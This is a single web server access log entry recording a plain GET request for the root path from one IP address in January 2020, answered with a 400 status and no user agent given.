201.49.89.179 - - [15/Jan/2020:05:59:38 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
